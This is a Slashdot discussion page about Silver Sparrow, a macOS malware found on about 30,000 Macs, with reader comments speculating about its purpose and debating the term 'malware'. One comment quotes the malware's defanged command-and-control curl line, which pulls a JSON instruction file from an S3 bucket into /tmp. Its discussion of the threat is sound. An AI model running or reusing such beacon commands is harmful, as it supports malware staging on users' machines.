Sophisticated New Malware Found on 30,000 Macs Stumps Security Pros (arstechnica.com) 66
Long-time Slashdot reader b0s0z0ku quotes Ars Technica:
A previously undetected piece of malware found on almost 30,000 Macs worldwide is generating intrigue in security circles, which are still trying to understand precisely what it does and what purpose its self-destruct capability serves.
Once an hour, infected Macs check a control server to see if there are any new commands the malware should run or binaries to execute. So far, however, researchers have yet to observe delivery of any payload on any of the infected 30,000 machines, leaving the malware's ultimate goal unknown. The lack of a final payload suggests that the malware may spring into action once an unknown condition is met.
Also curious, the malware comes with a mechanism to completely remove itself, a capability that's typically reserved for high-stealth operations. So far, though, there are no signs the self-destruct feature has been used, raising the question why the mechanism exists. Besides those questions, the malware is notable for a version that runs natively on the M1 chip that Apple introduced in November, making it only the second known piece of macOS malware to do so...
The malware has been found in 153 countries with detections concentrated in the US, UK, Canada, France, and Germany.
Red Canary, the security firm that discovered the malware, has named it "Silver Sparrow." Long-time Slashdot reader Nihilist_CE writes: First detected in August of 2020, the Silver Sparrow malware is interesting in several unsettling ways. It uses the macOS Installer Javascript API to launch a bash process to gain a foothold into the user's system, a hitherto-unobserved method for bypassing malware detection. This bash shell is then used to invoke macOS's built-in PlistBuddy tool to create a LaunchAgent which executes a bash script every hour. This is the command and control process, which downloads a JSON file containing (potentially) new instructions.
Besides the novel installation method, Silver Sparrow is also mysterious in its payload: a single, tiny binary that does nothing but open a window reading "Hello, World!" (in v1, which targets Intel Macs) or "You did it!" (in v2, which is an M1-compatible fat binary). These "bystander binaries" are never executed and appear to be proofs-of-concept or placeholders for future functionality.
Once an hour, infected Macs check a control server to see if there are any new commands the malware should run or binaries to execute. So far, however, researchers have yet to observe delivery of any payload on any of the infected 30,000 machines, leaving the malware's ultimate goal unknown. The lack of a final payload suggests that the malware may spring into action once an unknown condition is met.
Also curious, the malware comes with a mechanism to completely remove itself, a capability that's typically reserved for high-stealth operations. So far, though, there are no signs the self-destruct feature has been used, raising the question why the mechanism exists. Besides those questions, the malware is notable for a version that runs natively on the M1 chip that Apple introduced in November, making it only the second known piece of macOS malware to do so...
The malware has been found in 153 countries with detections concentrated in the US, UK, Canada, France, and Germany.
Red Canary, the security firm that discovered the malware, has named it "Silver Sparrow." Long-time Slashdot reader Nihilist_CE writes: First detected in August of 2020, the Silver Sparrow malware is interesting in several unsettling ways. It uses the macOS Installer Javascript API to launch a bash process to gain a foothold into the user's system, a hitherto-unobserved method for bypassing malware detection. This bash shell is then used to invoke macOS's built-in PlistBuddy tool to create a LaunchAgent which executes a bash script every hour. This is the command and control process, which downloads a JSON file containing (potentially) new instructions.
Besides the novel installation method, Silver Sparrow is also mysterious in its payload: a single, tiny binary that does nothing but open a window reading "Hello, World!" (in v1, which targets Intel Macs) or "You did it!" (in v2, which is an M1-compatible fat binary). These "bystander binaries" are never executed and appear to be proofs-of-concept or placeholders for future functionality.
Where is the control server ? (Score:4, Insightful)
The article did not say so. Apple seems to know who did it as "Apple has revoked the developer certificate for both bystander binary files." - will we be told who they are (once checked out) ?
Re:Where is the control server ? (Score:5, Insightful)
It's probably easy to get a developer account anonymously, but just wait until Apple has its security chips sign apps and refuses to run apps not signed by the chip. Then they'll trace supply chain logistics on a machine's serial number.
"To combat malware," of course, but then subsequently whomever the Parler app developer is finds his machine unable to compile runnable code anymore.
"Find out why 2024 will be like 1984".
Re: Where is the control server ? (Score:3)
This has the makings of a good Babylon Bee article. Increase the humour, reduce the fantasy, and submit your draft. The trick is to be over the top while skirting Poeâ(TM)s law.
Re: Where is the control server ? (Score:5, Funny)
Poe's law? Nevermore!
Re: Where is the control server ? (Score:2)
Wish I had mod points... :)
Re: Where is the control server ? (Score:2)
Well played!
Re: Where is the control server ? (Score:4, Funny)
People have been raven' about that for a long time.
Re: (Score:2, Informative)
Amazon was warning Parler back in November about violating their TOS. https://www.npr.org/sections/i... [npr.org]
Jan 6th was the final straw.
Re: (Score:2)
The big tech companies literally and openly colluded to get rid of an app they didn't like.
...and?
I'm waiting for the punchline here. Colluding in this scenario isn't illegal. Nor was anything else that they did.
What's the source of your outrage? What is it that offends you so?
So far, the only thing I can conclude is:
The big tech companies literally and openly colluded to get rid of an app they didn't like, and I don't like that they did that.
Yep, that's about it. Nothing more to see here.
Moving on...
Re: Where is the control server ? (Score:2)
Sure, but how does that necessarily lead to blocking software compiled on a specific Mac? If you see a logical progression then why not skip straight to the final stage of mounting guns next to the webcam so Apple can remotely shoot transgressors against the Californian cult?
Re: (Score:2, Flamebait)
but just wait until Apple has its security chips sign apps and refuses to run apps not signed by the chip.
Right. Because Apple is willing to destroy their image of their computers being the preferred platform for creating content, which includes software, because someone found a virus.
Maybe instead we could see Apple create their own anti-malware defenses like Microsoft has done with Windows Defender.
Or maybe not. Because if Apple is making anti-malware scanning software for their computers then that would be an implied admission that Apple computers lack inherent security from their operating system policies
Re: (Score:2)
Current users might be locked in but future users are not. Attempts to lock people in too tight only puts people off and leads to a slow suicide by people not getting lassoed in, and people that can afford the hit of switching out clearing a path for others to follow.
Microsoft was nearly ended by their lock in attempts. At first this was from the government acting on complaints from their competition. Later on this came from the competition creating open standards and reverse engineering Microsoft's file
Re: (Score:3)
From TFS:
The server it downloads that JSON file from is the server in question.
Re: (Score:3, Informative)
curl hxxps://specialattributes.s3.amazonaws[.]com/applications/updater/ver.json > /tmp/version.json /tmp/version.json -o /tmp/version.plist
plutil -convert xml1 -r
This is from the article. Looks like an s3 bucket of some sort.
Yeah, ideally the IP addresses/ranges. (Score:2)
Sigh (Score:5, Interesting)
You guys never played Plague Inc?
You wait until you're in any many places as possible and nobody has noticed, before you start doing any action which might give away your presence.
Honestly, there's nothing different about that - nor to having an "disinfect" action.
The only thing "new" here is that it has a target for the M1 arch, and even that - as the article points out - isn't unique.
This is hyperbole, it's just malware, this is exactly how malware works, and how malware is operated if the authors have half a brain.
Re:Sigh (Score:5, Interesting)
I had the same thought...not unusual for it to appear to not do anything, as you wait until everything is in place before activating. Likewise, regarding the statement that there is no sign the self destruct has activated, you wouldn't expect it to self destruct before it has been activated.
Then I put on my tin foil hat and thought perhaps the self destruct has been activated. Maybe that's why they found it on so few macs. It deployed and activated, completed its mission, and then was deactivated. The 30k that are left for some reason either didn't operate properly, or weren't turned on for the period where the control server was telling them to deactivate, or failed the uninstall somehow.
However, I don't know what sort of logging macs do in this regard (either software installations or apps launching other app). Maybe it's possible for them to tell that no software was activated by the software.
watching the access log for s3 bucket (Score:2)
Re: (Score:3)
This looks a lot like a proof-of-concept malware system built by a kid for lulz. Way back in the day, I wrote a trivial virus for Mac System 7.1 (you know, when an '040 was a good processor), just to see if I could do it. Fortunately it never got into the wild. This looks like the same level of effort.
Re: Sigh (Score:4, Insightful)
I think everyone did that at least once in their programming career, usually when young. First, it is exciting and against the rules, second, it teaches you and shows that you know a lot about a system.
Also, you gain the power to fight back. Which is good for self-confidence. And then you succeed at other things and you don't even need it anymore, which is a constant reminder of your own confidence.
Kinda a programmer rite of passage.
Re: (Score:2)
Kinda a programmer rite of passage.
Like "Hello World".
Re: (Score:2)
Re: (Score:2)
You guys never played Plague Inc?
You wait until you're in any many places as possible and nobody has noticed, before you start doing any action which might give away your presence.
Yep. It doesn't take a genius to figure out what the "unknown condition" is.
I'd say it's "when there's more than 30,000 Macs infected".
(or some other number)
Luckily no Mac is running any anti-malware program that can kick it off the disk.
Re: (Score:2)
You guys never played Plague Inc?
Did you not visit Slashdot this past year? Based on how people were talking about COVID it's clear they haven't even done something this basic.
Nonsense! (Score:5, Insightful)
Guys, it isn't even malware! The installer does weird things that are usually associated with malware, but the software actually does nothing than showing a screen with a message. The "malware" was actually signed with a genuine developer certificate, so Apple would know who did it, and the developer certificates have been revoked which most likely means their account is closed.
Re:Nonsense! (Score:5, Insightful)
The real problem here is that we invented the word "malware" to replace "trojans", "viruses" and other annoying software because people are too stupid to differentiate between a self-installing, self-propagating virus and a trojan that needs to be installed by the user itself.
Re: (Score:1)
Trojans are malware. "DontBeAMoran"
The pedantic complaint you are looking for is "a trojan is not a virus". Nice try at looking intelligent.
Re: Nonsense! (Score:3)
His response in context was correct I think. The post he was responding to took issue that the malware wasn't sophisticated because it has to be installed by the user. Which itself is valid, since we often measure sophisitication on its effectiveness in how easily it can spread undetected.
But the use of the word malware is often affributed to crap on a machine that is both damaging and you don't know about it. So I personally think it could be forgiven by assuming the use of the word malware meant someth
Re: (Score:3)
OP: "Guys, it isn't even malware!"
Response: "The real problem here is that we invented the word "malware" to replace..."
Trojans ARE malware, and the "real problem" isn't that the term "malware" was invented. It's irrelevant to the entire conversation what "category" of malware it is. So what context here makes his response correct?
"The post he was responding to took issue that the malware wasn't sophisticated because it has to be installed by the user."
Yes, a typical attack to denigrate someone else's com
Re: (Score:2)
I don't know how you understood it that way, but I never said that trojans aren't malware.
Let me explain it again: I said that malware is too broad of a description and that the word is a bit useless in describing the scope of the problem. Are computers getting infected by simply visiting a website, or does a stupid user need to enter his password to install something himself?
Re: (Score:2)
Change it's name to Stupidware.
Re: (Score:3)
There's a huge difference between "trojan that 30,000 naive users accidentally installed because they wanted a browser toolbar with a purple talking gorilla in it" and "worm that infected 30,000 computers remotely through zero user intervention". The problem is that the average user doesn't care about the distinction, even though the difference is significant.
Re: (Score:2)
because people are too stupid to differentiate between a self-installing, self-propagating virus and a trojan that needs to be installed by the user itself.
Ultimately for a user it's a distinction without a difference when it comes to their security. We've proven quite well time and time again that users are either good at preventing infection from viruses and trojans, or are good at neither.
Re: (Score:2)
I've seen malware used to refer to cookies.
Re: (Score:2)
And everything we don't like is "evil". Welcome to the watering down of the English language. Hopefully nothing will come of it, just a lessening of the outrage.
Re: (Score:2)
And everything we want to remove is being "killed" or "deleted".
Slashdot is often guilty of that with their stupid "senators want to kill this bill" for example. You can't kill a bill, it's not a living thing.
Unless of course we're talking about "Kill Bill" which is a kick-ass two-parts movie.
Re: Nonsense! (Score:3)
1. Every malware isn't malware ... until it is. That is what the vector/payload separation is for.
2. Yes, it's script kiddie level. Nice if you are... say, 15. Practical, as it does the job, if you are 19. But if you're a grown man, and your "malware" requires the target to download and run the thing himself, then it keeping itself in the system really isn't making it pathetic anymore. :)
...any LESS pathetic. (Score:2)
I meant "isn't making it any LESS pathetic". Whoops.
Re:Nonsense! (Score:4, Insightful)
The malware is not "sophisticated". There is an installer that you need to download and install the malware yourself. So you only get it through utter user stupidity.
From the article: "It remains unclear precisely how or where the malware is being distributed or how it gets installed."
If they managed to get 30,000+ people to install it, that's quiet interesting, especially as they say they don't know how that's been done. The level of sophistication (although it seems like a perfectly valid starting point for something much more) seems out of keeping with the number of installs or using fancy zero day exploits for a mass infection campaign. I suspect it was probably bundled with something, but do mac users install as many random, dubious apps on desktops as they might on their phones? Given the hello world samples included it might just be a little developers toy/ debugging aid that accidentally got shipped with a legit product.
Re: (Score:2)
Re: (Score:2)
Itâ(TM)s easy to get 30,000 people to install something. Get an ad that offers something they want for free. Free porn, free bitcoins, VLC or Flash player, better/free version of Adobe software whatever.
How big of an ad campaign would you need to get not just 30,000 clicks but 30,000 downloads and installs? Sounds expensive for something that, 6 months later, doesn't appear to have been used. If a week later they were all mining bitcoin I could understand it.
Re: (Score:2)
Free Slashdot account, get'em before they're all gone!
Re: (Score:2)
Did you even read the summary? The malware checks every hour with a server to see if there are new instructions, and those instructions could be most anything. Until the balloon goes up, this scout tries to keep a low profile.
Flawed prototype? (Score:5, Funny)
These 30,000 malfunctioned in that they did not execute the 'self-destruct' issued a while ago. Fortunately the other 2 million did fine.
Just make an honest effort (Score:5, Funny)
God, the distal end of the LGBTQ acronym is changing so fast I can hardly keep up.
Re: (Score:1)
Goddammit I just had an appendectomy, don't make me laugh!
Re: (Score:2)
Literally crying...
Thanks for that!
Software Firewall (Score:2)
how do we detect if we have it? (Score:2)
is someone gonna let us know how we can ensure we're not infected?
Let me save you the trouble of speculation. (Score:1)
I know exactly what this malware is, and I've seen a lot like it. It's only out there to be used against me, either directly or indirectly. The mystery activation clause is "I or someone I know buys one of these stupid things." And after it is activated, they'll deny all knowledge of it, collect it, study it, alter it, and redeploy it for themselves. Our government is corrupt.
They were too clever for their own good (Score:2)
For the love of Mike, JavaScript???? (Score:2)
I read somewhere that Macs were supposed to be secure. And the MacOS installer has a JavaScript API? Sheesh, I;m sticking to Gentoo.
Re (Score:1)
JavaScript! (Score:2)
SEE GUYS, SEE! This is PROOF that JavaScript is a terrible piece of evil THAT CAN ONLY be used for EVIL THINGS! ZOMG JavaScript doesn't even HAVE TYPE SAFETY! And Node.JS relies on a package manager where you JUST DON"T KNOW WHAT EVIL IS BEING INSTALLED ON YOUR MACHINE!
Go away, JavaScript, and let me compile my program and its three dependencies in assembly language by hand.